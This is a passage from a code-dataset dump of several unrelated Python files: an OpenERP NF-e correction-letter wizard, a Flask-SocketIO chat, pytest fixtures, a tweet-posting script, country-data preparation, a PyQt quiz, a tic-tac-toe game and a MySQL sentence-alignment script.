#\n# #\n#This program is distributed in the hope that it will be useful, #\n#but WITHOUT ANY WARRANTY; without even the implied warranty of #\n#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #\n#GNU Affero General Public License for more details. #\n# #\n#You should have received a copy of the GNU Affero General Public License #\n#along with this program. If not, see . #\n###############################################################################\n\nfrom openerp.osv import fields, orm\nfrom openerp.tools.translate import _\nfrom nfe.sped.nfe.processing.xml import send_correction_letter\n\nclass NfeInvoiceCce(orm.TransientModel):\n\n _name='nfe.invoice_cce'\n \n _columns = {\n 'mensagem': fields.text('Mensagem', required=True),\n }\n \n def _check_name(self, cr, uid, ids):\n \n for nfe in self.browse(cr, uid, ids):\n\n if not (len(nfe.mensagem) >= 15):\n return False\n \n return True\n \n _constraints = [(_check_name, 'Tamanho de mensagem inválida !', ['mensagem'])]\n \n def action_enviar_carta(self, cr, uid, ids, context=None):\n\n if context is None:\n context = {}\n \n correcao = self.browse(cr, uid, ids)[0].mensagem\n\n obj_invoice = self.pool.get('account.invoice')\n obj_cce = self.pool.get('l10n_br_account.invoice.cce')\n invoice_ids = context and context.get('active_ids') or []\n \n for invoice in obj_invoice.browse(cr, uid, invoice_ids):\n chave_nfe = invoice.nfe_access_key\n \n company_pool = self.pool.get('res.company')\n company = company_pool.browse(cr, uid, invoice.company_id.id)\n event_obj = self.pool.get('l10n_br_account.document_event')\n domain = [('invoice_id', '=', invoice.id)] \n sequencia = len(obj_cce.search(cr, uid, domain ))+1\n results = []\n try:\n processo = send_correction_letter(company, chave_nfe, sequencia, correcao)\n vals = {\n 'type': str(processo.webservice),\n 'status': processo.resposta.retEvento[0].infEvento.cStat.valor,\n 'response': '',\n 'company_id': company.id,\n 'origin': '[CC-E] ' + str(invoice.internal_number),\n# 'file_sent': processo.arquivos[0]['arquivo'], #TODO não implementado no PySPED\n# 'file_returned': processo.arquivos[1]['arquivo'],\n 'message': processo.resposta.retEvento[0].infEvento.xEvento.valor,\n 'state': 'done',\n 'document_event_ids': invoice.id}\n results.append(vals)\n obj_invoice.attach_file_event(cr, uid, invoice_ids, sequencia, 'cce', 'xml', context)\n\n except Exception as e:\n vals = {\n 'type': '-1',\n 'status': '000',\n 'response': 'response',\n 'company_id': company.id,\n 'origin': '[CC-E]' + str(invoice.internal_number),\n 'file_sent': 'False',\n 'file_returned': 'False',\n 'message': 'Erro desconhecido ' + e.message,\n 'state': 'done',\n 'document_event_ids': invoice.id,\n }\n results.append(vals)\n finally:\n for result in results:\n event_obj.create(cr, uid, result) \n obj_cce.create(cr,uid, \n {'invoice_id': invoice.id,\n 'motivo': correcao,\n 'sequencia': sequencia,\n } \n ) \n return {'type': 'ir.actions.act_window_close'}\n","sub_path":"nfe/wizard/nfe_invoice_cce.py","file_name":"nfe_invoice_cce.py","file_ext":"py","file_size_in_byte":5144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"74793901","text":"from flask import Flask, render_template, request\nfrom flask_socketio import SocketIO, send, emit\nfrom time import gmtime, strftime\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'secret!'\nsocketio = SocketIO(app)\n\nclients = []\n\n@socketio.on('connect')\ndef test_connect():\n emit('my response', {'data': 
'Connected'})\n\n@socketio.on('message')\ndef handle_message(json):\n send(\"(\" +str(strftime(\"%H:%M:%S\", gmtime()))+\") \" + json, broadcast=True)\n\n@app.route(\"/\")\ndef main():\n return render_template('index.htm')\n\n\nif __name__ == '__main__':\n socketio.run(app)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"390818342","text":"#_author:leo gao\n#encoding:utf-8\n\nimport pytest\nfrom operationalLayer.Login.login import LoginOperate\nfrom operationalLayer.deviceManagement.deviceManagementAddOperate import DeviceManagementAddOperate\nfrom operationalLayer.deviceManagement.deviceManagementModifyOperate import DeviceManagementModifyOperate\nfrom Url.Login import login\nfrom Url.deviceManagement import deviceManagement\nfrom Data.Login import noraml_login_data\nfrom Data.deviceManagement.add_device import normal_add_device_data\nfrom Utils.operateDatabaseData import delete_database_data_test_ci, add_database_data_test_ci\n\n\n@pytest.fixture()\ndef state_login_class(state_driver):\n login_operate = LoginOperate(state_driver, login.login_url)\n return login_operate\n\n\n@pytest.fixture()\ndef normal_login(state_login_class):\n '''\n 用例描述:输入正确管理员账号,正确密码,验证码(随便)正常登录\n :return:\n '''\n\n state_login_class.get_login_url()\n state_login_class.input_account(noraml_login_data.account, noraml_login_data.password,\n noraml_login_data.verification_code)\n state_login_class.confirm_login_button()\n\n\n@pytest.fixture()\ndef state_add_device_management_class(state_driver):\n add_device_management_operate = DeviceManagementAddOperate(state_driver, deviceManagement.device_manager_url)\n return add_device_management_operate\n\n\n@pytest.fixture()\ndef add_device_fixture(state_add_device_management_class):\n state_add_device_management_class.click_device_management()\n state_add_device_management_class.input_device_name_ip(\n normal_add_device_data.normal_add_device_data.get('device_name'),\n normal_add_device_data.normal_add_device_data.get('device_ip'))\n state_add_device_management_class.choose_device_type()\n state_add_device_management_class.choose_organization_manufacturer(normal_add_device_data.\n normal_add_device_data.get('manufacturer'))\n\n\n@pytest.fixture()\ndef state_modify_device_management_class(state_driver):\n modify_device_management_operate = DeviceManagementModifyOperate(state_driver, deviceManagement.device_manager_url)\n return modify_device_management_operate\n\n\n@pytest.fixture(scope='function', autouse=True)\ndef database_base_configuration():\n delete_database_data_test_ci()\n add_database_data_test_ci()\n\n","sub_path":"test_cases/test_device_management/test_modify_device/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"124853614","text":"#!/usr/bin/python\n\n# -*- coding: utf-8 -*-\n\nimport twitter\nimport random\n\ntweets = []\ntweets.append('aaaa')\ntweets.append('bbbb')\ntweets.append('cccc')\n\ntweet = tweets[random.randint(0, len(tweets)-1)]\n\napi = twitter.Api(consumer_key = \"\",\n consumer_secret = \"\",\n access_token_key = \"\",\n access_token_secret = \"\")\n\napi.PostUpdate(tweet)\n","sub_path":"post_twitter.py","file_name":"post_twitter.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} 
+{"seq_id":"109858782","text":"from pathlib import Path\n\nimport pandas as pd\nimport pycountry\n\nimport mundi\n\ninv = lambda d: {v: k for k, v in d.items()}\nPATH = Path(__file__).parent.resolve()\nCOL_RENAME = {\"alpha_2\": \"short_code\", \"alpha_3\": \"long_code\", \"numeric\": \"numeric_code\"}\nREGION_MAP = inv(mundi.REGION_DESCRIPTIONS)\nINCOME_MAP = inv(mundi.INCOME_GROUP_DESCRIPTIONS)\n\n#\n# This script uses pycountry (https://pypi.org/project/pycountry/) as the main\n# source of information about countries and sub-divisions.\n#\ndf = pd.DataFrame([c._fields for c in pycountry.countries])\ndf = (\n df.rename(COL_RENAME, axis=1)\n .drop(columns=[\"official_name\", \"common_name\"])\n .astype(\"string\")\n .set_index(\"short_code\", drop=False)\n)\ndf.index.name = \"id\"\n\ndf[\"type\"] = \"country\"\ndf[\"subtype\"] = pd.NA\ndf[\"country_code\"] = pd.NA\ndf = df.astype(\"string\")\n\n#\n# Load UN classifications from world bank data\n#\nun_classes = pd.read_csv(PATH / \"world-bank-summary.csv\", index_col=0, dtype=\"string\")\nun_classes = un_classes[[\"region\", \"income_group\"]]\nun_classes[\"id\"] = df[\"long_code\"].reset_index().set_index(\"long_code\")\nun_classes = un_classes.dropna().set_index(\"id\")\n\n# Save to dataframe\nun_classes[\"region\"] = un_classes[\"region\"].apply(REGION_MAP.get)\nun_classes[\"income_group\"] = un_classes[\"income_group\"].apply(INCOME_MAP.get)\n\npath = PATH / \"processed\" / \"un.pkl\"\nun_classes.astype(\"category\").to_pickle(path)\nprint(f\"UN data saved to {path}\")\n\n\n#\n# Loading continents\n#\n\n# Load continent codes\n# https://en.wikipedia.org/wiki/List_of_sovereign_states_and_dependent_territories_by_continent_(data_file)#Data_file\ndata = pd.read_csv(PATH / \"countries-to-continents.csv\", index_col=0, dtype=\"string\")\ndf[\"parent_id\"] = \"X\" + data[\"continent_id\"]\n\n# Load continents\ndata = pd.read_csv(PATH / \"continents.csv\").fillna(\"NA\").set_index(\"id\")\ndata[\"type\"] = \"continent\"\ndata[\"parent_id\"] = \"XX\"\ndata[\"short_code\"] = data.index\ndata.loc[\"XX\", \"parent_id\"] = pd.NA\ndf = pd.concat([df, data]).astype(\"string\")\n\n# Transcontinental countries are assigned to their secondary continent in the\n# alt_parent column.\n# https://en.wikipedia.org/wiki/List_of_transcontinental_countries\ndf[\"alt_parents\"] = pd.Series(\n {\n \"AZ\": \"XEU\",\n \"AM\": \"XAS\",\n \"CY\": \"XAS\",\n \"GE\": \"XAS\",\n \"KZ\": \"XEU\",\n \"UM\": \"XOC\",\n \"RU\": \"XAS\",\n \"TR\": \"XEU\",\n \"EG\": \"XAS\",\n },\n dtype=\"string\",\n)\ndf[\"alt_parents\"] = \";\" + df[\"alt_parents\"]\n\n#\n# Saving results\n#\ndf = df.astype(\"string\")[mundi.DATA_COLUMNS[\"mundi\"]]\nassert len(set(df.index)) == len(df)\n\npath = PATH / \"processed\" / \"mundi-A1-countries.pkl\"\ndf.to_pickle(path)\nprint(f\"Country data saved to {path}\")\n","sub_path":"data/XX/prepare-countries.py","file_name":"prepare-countries.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"601153450","text":"import sys\r\nimport random\r\nimport xml.dom.minidom\r\nfrom learn1 import *\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\n\r\nclass MyWin(QtWidgets.QMainWindow):\r\n \r\n text = []\r\n questions = []\r\n variants = []\r\n correct = []\r\n \r\n def __init__(self, parent=None):\r\n QtWidgets.QWidget.__init__(self, parent)\r\n self.ui = Ui_MainWindow()\r\n self.ui.setupUi(self)\r\n\r\n self.dom = xml.dom.minidom.parse('learn.xml')\r\n 
self.collection = self.dom.documentElement\r\n self.linesArr = self.collection.getElementsByTagName(\"text\")\r\n\r\n for line in self.linesArr:\r\n self.text.append(line.childNodes[0].data)\r\n self.questions.append(line.getAttribute('question'))\r\n self.variants.append(line.getAttribute('answers').split('**?**'))\r\n self.correct.append(line.getAttribute('correct'))\r\n\r\n random.shuffle(self.variants[0])\r\n random.shuffle(self.variants[1])\r\n random.shuffle(self.variants[2])\r\n \r\n random.shuffle(self.variants[3])\r\n random.shuffle(self.variants[4])\r\n random.shuffle(self.variants[5])\r\n random.shuffle(self.variants[6])\r\n random.shuffle(self.variants[7])\r\n random.shuffle(self.variants[8])\r\n random.shuffle(self.variants[9])\r\n\r\n self.ui.textEdit.setText(self.questions[0])\r\n self.ui.textEdit_2.setText(self.questions[1])\r\n self.ui.textEdit_3.setText(self.questions[2])\r\n \r\n self.ui.textEdit_7.setText(self.questions[3])\r\n self.ui.textEdit_8.setText(self.questions[4])\r\n self.ui.textEdit_24.setText(self.questions[5])\r\n self.ui.textEdit_25.setText(self.questions[6])\r\n self.ui.textEdit_26.setText(self.questions[7])\r\n self.ui.textEdit_27.setText(self.questions[8])\r\n self.ui.textEdit_28.setText(self.questions[9])\r\n \r\n \r\n self.ui.label.setText(self.text[0])\r\n self.ui.label_2.setText(self.text[1])\r\n self.ui.label_3.setText(self.text[2])\r\n\r\n self.ui.label_7.setText(self.text[2])\r\n self.ui.label_8.setText(self.text[2])\r\n self.ui.label_24.setText(self.text[2])\r\n self.ui.label_25.setText(self.text[2])\r\n self.ui.label_26.setText(self.text[2])\r\n self.ui.label_27.setText(self.text[2])\r\n self.ui.label_28.setText(self.text[2])\r\n\r\n self.ui.radioButton.setText(self.variants[0][0])\r\n self.ui.radioButton_2.setText(self.variants[0][1])\r\n self.ui.radioButton_3.setText(self.variants[0][2])\r\n\r\n self.ui.radioButton_4.setText(self.variants[1][0])\r\n self.ui.radioButton_5.setText(self.variants[1][1])\r\n self.ui.radioButton_6.setText(self.variants[1][2])\r\n\r\n self.ui.radioButton_7.setText(self.variants[2][0])\r\n self.ui.radioButton_8.setText(self.variants[2][1])\r\n self.ui.radioButton_9.setText(self.variants[2][2])\r\n\r\n \r\n\r\n self.ui.radioButton_19.setText(self.variants[3][0])\r\n self.ui.radioButton_20.setText(self.variants[3][1])\r\n self.ui.radioButton_21.setText(self.variants[3][2])\r\n\r\n self.ui.radioButton_22.setText(self.variants[4][0])\r\n self.ui.radioButton_23.setText(self.variants[4][1])\r\n self.ui.radioButton_24.setText(self.variants[4][2])\r\n\r\n self.ui.radioButton_70.setText(self.variants[5][0])\r\n self.ui.radioButton_71.setText(self.variants[5][1])\r\n self.ui.radioButton_72.setText(self.variants[5][2])\r\n\r\n self.ui.radioButton_73.setText(self.variants[6][0])\r\n self.ui.radioButton_74.setText(self.variants[6][1])\r\n self.ui.radioButton_75.setText(self.variants[6][2])\r\n\r\n self.ui.radioButton_76.setText(self.variants[7][0])\r\n self.ui.radioButton_77.setText(self.variants[7][1])\r\n self.ui.radioButton_78.setText(self.variants[7][2])\r\n\r\n self.ui.radioButton_79.setText(self.variants[8][0])\r\n self.ui.radioButton_80.setText(self.variants[8][1])\r\n self.ui.radioButton_81.setText(self.variants[8][2])\r\n\r\n self.ui.radioButton_82.setText(self.variants[9][0])\r\n self.ui.radioButton_83.setText(self.variants[9][1])\r\n self.ui.radioButton_84.setText(self.variants[9][2])\r\n \r\n\r\n self.ui.tabWidget.setTabEnabled(1, False)\r\n self.ui.tabWidget.setTabEnabled(2, False)\r\n \r\n 
self.ui.tabWidget.setTabEnabled(3, False)\r\n self.ui.tabWidget.setTabEnabled(4, False)\r\n self.ui.tabWidget.setTabEnabled(5, False)\r\n self.ui.tabWidget.setTabEnabled(6, False)\r\n self.ui.tabWidget.setTabEnabled(7, False)\r\n self.ui.tabWidget.setTabEnabled(8, False)\r\n self.ui.tabWidget.setTabEnabled(9, False)\r\n\r\n self.ui.buttonGroup.buttonClicked.connect(self.correctAnsl)\r\n self.ui.buttonGroup_2.buttonClicked.connect(self.correctAnsl2)\r\n self.ui.buttonGroup_3.buttonClicked.connect(self.correctAnsl3)\r\n\r\n self.ui.buttonGroup_4.buttonClicked.connect(self.correctAnsl4)\r\n self.ui.buttonGroup_5.buttonClicked.connect(self.correctAnsl5)\r\n self.ui.buttonGroup_6.buttonClicked.connect(self.correctAnsl6)\r\n self.ui.buttonGroup_7.buttonClicked.connect(self.correctAnsl7)\r\n self.ui.buttonGroup_8.buttonClicked.connect(self.correctAnsl8)\r\n self.ui.buttonGroup_9.buttonClicked.connect(self.correctAnsl9)\r\n self.ui.buttonGroup_10.buttonClicked.connect(self.correctAnsl10)\r\n\r\n\r\n\r\n def correctAnsl(self):\r\n for rb in self.ui.buttonGroup.buttons():\r\n if rb.isChecked():\r\n if rb.text() == self.correct[0]:\r\n self.ui.statusbar.showMessage(\"Верно!\",2000)\r\n self.ui.tab.setEnabled(False)\r\n self.ui.tabWidget.setTabEnabled(1, True)\r\n\r\n def correctAnsl2(self):\r\n for rb in self.ui.buttonGroup_2.buttons():\r\n if rb.isChecked():\r\n if rb.text() == self.correct[1]:\r\n self.ui.statusbar.showMessage(\"Верно!\",2000)\r\n self.ui.tab_2.setEnabled(False)\r\n self.ui.tabWidget.setTabEnabled(2, True)\r\n\r\n def correctAnsl3(self):\r\n for rb in self.ui.buttonGroup_3.buttons():\r\n if rb.isChecked():\r\n if rb.text() == self.correct[2]:\r\n self.ui.statusbar.showMessage(\"Верно!\",2000)\r\n self.ui.tab_3.setEnabled(False)\r\n self.ui.tabWidget.setTabEnabled(3, True)\r\n\r\n def correctAnsl4(self):\r\n for rb in self.ui.buttonGroup_4.buttons():\r\n if rb.isChecked():\r\n if rb.text() == self.correct[3]:\r\n self.ui.statusbar.showMessage(\"Верно!\",2000)\r\n self.ui.tab_7.setEnabled(False)\r\n self.ui.tabWidget.setTabEnabled(4, True)\r\n\r\n def correctAnsl5(self):\r\n for rb in self.ui.buttonGroup_5.buttons():\r\n if rb.isChecked():\r\n if rb.text() == self.correct[4]:\r\n self.ui.statusbar.showMessage(\"Верно!\",2000)\r\n self.ui.tab_8.setEnabled(False)\r\n self.ui.tabWidget.setTabEnabled(5, True)\r\n\r\n def correctAnsl6(self):\r\n for rb in self.ui.buttonGroup_6.buttons():\r\n if rb.isChecked():\r\n if rb.text() == self.correct[5]:\r\n self.ui.statusbar.showMessage(\"Верно!\",2000)\r\n self.ui.tab_9.setEnabled(False)\r\n self.ui.tabWidget.setTabEnabled(6, True)\r\n \r\n def correctAnsl7(self):\r\n for rb in self.ui.buttonGroup_7.buttons():\r\n if rb.isChecked():\r\n if rb.text() == self.correct[6]:\r\n self.ui.statusbar.showMessage(\"Верно!\",2000)\r\n self.ui.tab_10.setEnabled(False)\r\n self.ui.tabWidget.setTabEnabled(7, True)\r\n\r\n def correctAnsl8(self):\r\n for rb in self.ui.buttonGroup_8.buttons():\r\n if rb.isChecked():\r\n if rb.text() == self.correct[7]:\r\n self.ui.statusbar.showMessage(\"Верно!\",2000)\r\n self.ui.tab_11.setEnabled(False)\r\n self.ui.tabWidget.setTabEnabled(8, True)\r\n\r\n def correctAnsl9(self):\r\n for rb in self.ui.buttonGroup_9.buttons():\r\n if rb.isChecked():\r\n if rb.text() == self.correct[8]:\r\n self.ui.statusbar.showMessage(\"Верно!\",2000)\r\n self.ui.tab_12.setEnabled(False)\r\n self.ui.tabWidget.setTabEnabled(9, True)\r\n\r\n def correctAnsl10(self):\r\n for rb in self.ui.buttonGroup_10.buttons():\r\n if rb.isChecked():\r\n if 
rb.text() == self.correct[9]:\r\n self.ui.statusbar.showMessage(\"Верно! Тест пройден!!!\",5000)\r\n self.ui.tab_13.setEnabled(False)\r\n \r\n\r\nif __name__==\"__main__\":\r\n app = QtWidgets.QApplication(sys.argv)\r\n myapp = MyWin()\r\n myapp.show()\r\n sys.exit(app.exec_())\r\n\r\n\r\n \r\n","sub_path":"1 семестр/3/Test/learnmain1.py","file_name":"learnmain1.py","file_ext":"py","file_size_in_byte":9067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"128049959","text":"#! /usr/bin/env python3\n# coding: utf-8\n\n\"\"\"\n Vegalt : find an vegan alternative to animal food products\n\n Files : cl_db_interactions.py, call-api.py, db_vegalt.sql, cl_vegalt.py, main.py\n\"\"\"\n\nfrom cl_vegalt import Vegalt\n\ndef main():\n \"\"\" Program loop \"\"\"\n\n # pylint: disable=line-too-long\n\n print(\"\\n ---- Vegalt - Trouvez une alternative végétale aux aliments issus de produits animaux ----\")\n\n # Connection to the database and start the program\n vegalt = Vegalt()\n vegalt.menu()\n\n continue_program = 1\n\n while continue_program:\n\n possibles_choices = [\"0\", \"1\", \"2\"]\n choice = vegalt.get_choice(\"\\n -- Choisissez 1 ou 2 (ou 0 pour quitter) : \", possibles_choices)\n\n if choice == \"0\":\n print(\"A bientôt !\")\n continue_program = 0\n\n if choice == \"1\":\n\n # Get the list of \"animals\" categories\n categories = vegalt.database.get_categories(0)\n\n print(\"\\n Voici les catégories d'aliments disponibles : \\n\")\n # Dictionnary to do the correspondance between the category id and the number (index) choosen\n id_correspondance = {}\n # Print each category and ask for choose one\n for index, category in enumerate(categories):\n print(index, \"-\", category[\"category_name\"])\n id_correspondance[str(index)] = category[\"id\"]\n\n possibles_choices = list(id_correspondance.keys())\n category_choice = vegalt.get_choice(\"\\n -- Entrez le chiffre de la catégorie voulue :\", possibles_choices)\n\n # Get the category id in the correspondance dictionnary\n category_id = id_correspondance[category_choice]\n\n # Get 10 random products associated to the choosen category\n products = vegalt.database.get_products_from_category(category_id, 10)\n\n print(\"\\n\")\n index_product = []\n # Print the products and ask for choose one\n for index, product in enumerate(products):\n print(index, \"-\", product[\"product_name\"], \"de\", product[\"brand_name\"])\n index_product.append(str(index))\n\n vegalt.get_choice(\"\\n -- Entrez le chiffre du produit que vous voulez remplacer :\", index_product)\n\n # Get 1 random product associated to the choosen category, but on vegan version\n veg_category_id = category_id + 1\n vegalt_product = vegalt.database.get_vegalt_product(veg_category_id, 1)\n\n print(\"\\nVous pouvez tester comme alternative végétale :\", vegalt_product[\"product_name\"], \"de la marque\", vegalt_product[\"brand_name\"])\n if vegalt_product[\"store\"]:\n print(\"Vous pouvez l'acheter dans ce magasin :\", vegalt_product[\"store\"])\n else:\n print(\"Malheureusement, nous n'avons pas trouvé de magasin où acheter ce produit\")\n print(\"Si vous voulez en savoir plus sur ce produit, ça se passe ici :\", vegalt_product[\"link\"])\n\n possibles_choices = [\"0\", \"1\"]\n registration_choice = vegalt.get_choice(\"\\n -- Voulez-vous enregistrer ce produit ? 
0 (non) / 1 (oui):\", possibles_choices)\n\n if registration_choice == \"1\":\n vegalt.database.register_product(vegalt_product[\"id\"])\n\n print(\"\\nLe produit a bien été enregistré dans vos favoris :)\")\n vegalt.menu()\n\n elif registration_choice == \"0\":\n print(\"\\nLe produit n'a pas été enregistré. Une autre fois peut-être !\")\n vegalt.menu()\n\n elif choice == \"2\":\n\n fav_products = vegalt.database.get_registered_products()\n\n if not fav_products:\n print(\"\\n Vous n'avez pas encore enregistré de produits en favori. Choisissez une catégorie et un produit, puis enregistrez-le pour le retrouver ici la prochaine fois.\")\n # Back to main menu\n vegalt.menu()\n else:\n print(\"\\n -- Voici vos produits enregistrés : \\n\")\n\n for fav_product in fav_products:\n print(fav_product[\"product_name\"], \"de\", fav_product[\"brand_name\"], \"(\", fav_product[\"link\"], \")\")\n\n vegalt.menu()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"533081529","text":"import random\r\nNUM_SQUARES = 9\r\nPLAYER1 = 'X'\r\nPLAYER2 = 'O'\r\nEMPTY = ' '\r\n\r\ndef create_board():\r\n \"\"\"Create a new empty tic-tac-toe board.\"\"\"\r\n board = []\r\n for square in range(NUM_SQUARES):\r\n board.append(EMPTY)\r\n return board\r\n\r\ndef display_board(board):\r\n \"\"\"Displays game board on screen\"\"\"\r\n print(\"\\n\\t\", board[0], \"|\", board[1], \"|\", board[2])\r\n print(\"\\t\", \"---------\")\r\n print(\"\\n\\t\", board[3], \"|\", board[4], \"|\", board[5])\r\n print(\"\\t\", \"---------\")\r\n print(\"\\n\\t\", board[6], \"|\", board[7], \"|\", board[8])\r\n\r\ndef player_letter():\r\n \"\"\"Decides what letter the player wants to be.\"\"\"\r\n letter = EMPTY\r\n while letter != PLAYER1 and letter != PLAYER2:\r\n letter = input(\"Do you want to be X or O? X is player 1, O is player 2 \").upper()\r\n print(\"You are now\", letter)\r\n\r\n if letter == 'X':\r\n return ['X', 'O']\r\n else:\r\n return ['O', 'X']\r\n\r\ndef first_or_second():\r\n \"\"\"Decides who goes first or second.\"\"\"\r\n if random.randint(0,1) == 0:\r\n print(\"The computer will go first\")\r\n return True\r\n else:\r\n print(\"The player will go first\")\r\n return False\r\n\r\ndef ask_number(board):\r\n \"\"\"Asks user for number to piece on board.\"\"\"\r\n number = \"-1\"\r\n while not number.isnumeric() or int(number) > 8 or int(number) < 0 or not isSpaceFree(board, int(number)):\r\n number = input(\"Please select a number between 0 and 8, and is an empty space. 
\")\r\n\r\n return number\r\n\r\ndef place_piece(number, letter, board):\r\n \"\"\"Puts piece on board.\"\"\"\r\n board[int(number)] = letter\r\n return board\r\n\r\ndef check_won(bo, turn):\r\n \"\"\"Checks if you won or not.\"\"\"\r\n return ((bo[6] == turn and bo[7] == turn and bo[8] == turn) or (bo[2] == turn and bo[4] == turn and bo[6] == turn) or (bo[0] == turn and bo[1] == turn and bo[2] == turn) or (bo[7] == turn and bo[4] == turn and bo[1] == turn) or (bo[8] == turn and bo[5] == turn and bo[2] == turn) or (bo[0] == turn and bo[1] == turn and bo[2] == turn) or (bo[3] == turn and bo[4] == turn and bo[5] == turn) or(bo[0] == turn and bo[3] == turn and bo[6] == turn) or(bo[0] == turn and bo[4] == turn and bo[8] == turn))\r\n \r\ndef isSpaceFree(board, number):\r\n return board[number] == EMPTY\r\n\r\ndef isSpacesFree(board, number_list):\r\n# Check if squares in number_list are empty.\r\n# Loop or go through the list.\r\n # For each square in the list, see if it is free or not.\r\n # True (it is free): return True\r\n# Exited the loop because reached end of list, didn't find any square free, so must return false.\r\n\r\n#If no squares are free, return false.\r\n#If at least one square is free, return true.\r\n for number in number_list:\r\n if isSpaceFree(board, number):\r\n return True\r\n return False\r\n \r\n\r\ndef chooseRandomMoveFromList(board, movesList, computerLetter):\r\n possibleMoves = []\r\n for index in movesList:\r\n if isSpaceFree(board, index):\r\n possibleMoves.append(index)\r\n\r\n for square in possibleMoves:\r\n copy = boardCopy(board)\r\n place_piece(square, computerLetter, copy)\r\n\r\n for square2 in range(NUM_SQUARES):\r\n copy2 = boardCopy(copy)\r\n if isSpaceFree(copy2, square2):\r\n place_piece(square2, computerLetter, copy2)\r\n if check_won(copy2, computerLetter):\r\n return square\r\n\r\n return random.choice(possibleMoves) \r\n \r\n\r\ndef boardCopy(board):\r\n dupeBoard = []\r\n\r\n for square in board:\r\n dupeBoard.append(square)\r\n\r\n return dupeBoard\r\n \r\n\r\ndef getComputerMove(board, computerLetter, playerLetter):\r\n for square in range(NUM_SQUARES):\r\n copy = boardCopy(board)\r\n if isSpaceFree(copy, square):\r\n place_piece(square, computerLetter, copy)\r\n if check_won(copy, computerLetter):\r\n return square\r\n\r\n for square in range(NUM_SQUARES):\r\n copy = boardCopy(board)\r\n if isSpaceFree(copy, square):\r\n place_piece(square, playerLetter, copy)\r\n if check_won(copy, playerLetter):\r\n return square\r\n\r\n # Is middle piece avaliable?\r\n # True: return number 4 and exit\r\n # False: Are the corner pieces avaliable?\r\n # True: return random free corner piece and exit\r\n # False: Are the side pieces avaliable?\r\n # True: return random free side piece and exit\r\n # False: (must be a tie) exit\r\n\r\n if isSpaceFree(board, 4):\r\n number = 4\r\n return number\r\n elif isSpacesFree(board, [0,2,6,8]):\r\n number = chooseRandomMoveFromList(board, [0,2,6,8], computerLetter)\r\n return number\r\n else:\r\n number = chooseRandomMoveFromList(board, [1,3,5,7], computerLetter)\r\n return number\r\n \r\n\r\ndef check_tie(board):\r\n \"\"\"Checks if there is a tie or not.\"\"\"\r\n for square in range(NUM_SQUARES):\r\n if isSpaceFree(board, square):\r\n return False\r\n return True\r\n\r\ndef main():\r\n \"\"\"This will be the main backbone of the whole tic-tac-toe program!\"\"\"\r\n print(\"Welcome to the legendary game of Tic-tac-toe versus Artificial Intelligence!\")\r\n game_board = create_board()\r\n display_board(game_board)\r\n 
playerLetter, computerLetter = player_letter()\r\n turn = first_or_second()\r\n while True:\r\n if turn == False:\r\n number = ask_number(game_board)\r\n place_piece(number, playerLetter, game_board)\r\n display_board(game_board)\r\n\r\n if check_won(game_board, playerLetter):\r\n print(\"You just beat the smartest AI in existence!\")\r\n break\r\n elif check_tie(game_board):\r\n print(\"It's a tie\")\r\n break\r\n else:\r\n turn = not turn\r\n else:\r\n number = getComputerMove(game_board, computerLetter, playerLetter)\r\n place_piece(number, computerLetter, game_board)\r\n display_board(game_board)\r\n\r\n if check_won(game_board, computerLetter):\r\n print(\"Looks like you lost. Oh well.\")\r\n break\r\n elif check_tie(game_board):\r\n print(\"It's a tie!\")\r\n break\r\n else:\r\n turn = not turn\r\n\r\nmain()\r\n \r\n#make code cleaner \r\n \r\n","sub_path":"tictactoevsai.py","file_name":"tictactoevsai.py","file_ext":"py","file_size_in_byte":6374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"434084184","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#import sqlite3\nimport math\nfrom itertools import izip\nimport mysql.connector\nimport modulopreprocesamiento\nimport codecs\n#conexion a la base de datos\nconn=mysql.connector.connect(user=\"root\",password=\"\",host=\"127.0.0.1\",database=\"bdveesavi\")\n\n#conn=sqlite3.connect(\"alineacionesdb.db\")\n\ndef crearTablaAlineaciones():\n \"\"\"Metodo para crear tabla de alineaciones\"\"\"\n global conn\n puntero=conn.cursor()\n puntero.execute(\"CREATE TABLE IF NOT EXISTS alineados(idalineacion int,oracionespaniol TEXT, oracionmixteco TEXT) ENGINE=InnoDB DEFAULT CHARSET=utf8;\") \n print(\"Tabla creada correctamente...\")\n \ncrearTablaAlineaciones()\n\ndef consultarAlineaciones():\n \"\"\"Metodo que permite consultar las alineaciones realizadas\"\"\"\n global conn\n puntero=conn.cursor()\n conn.text_factory = str\n puntero.execute('select oracionespaniol,oracionmixteco from alineados')\n datos=puntero.fetchall()\n listaalineaciones=[]\n for fila in datos:\n listaalineaciones.append(fila)\n return listaalineaciones\n\n#consultarAlineaciones()\ndef consultar():\n global conn\n puntero=conn.cursor()\n #conn.text_factory = str\n print(\"alineaciones\")\n puntero.execute('select*from alineados')\n for y in puntero:\n print(y)\n \nconsultar()\n\ndef consultaralineaciones():\n print(\"entrando a consultar\")\n lista=[]\n lista=consultarAlineaciones()\n for fila in lista:\n print(str(fila[1]))\n \n#consultaralineaciones() \n \ndef eliminarTablaAlineaciones():\n global conn\n puntero=conn.cursor()\n puntero.execute(\"delete from alineados\")\n conn.commit()\n print(\"se ha limpiado la tabla de alineados\")\n\ntry:\n import scipy.stats.norm\n norm_logsf = scipy.stats.norm.logsf\nexcept ImportError:\n def norm_cdf(z):\n \"\"\" Cumulative distribution for N(0, 1) 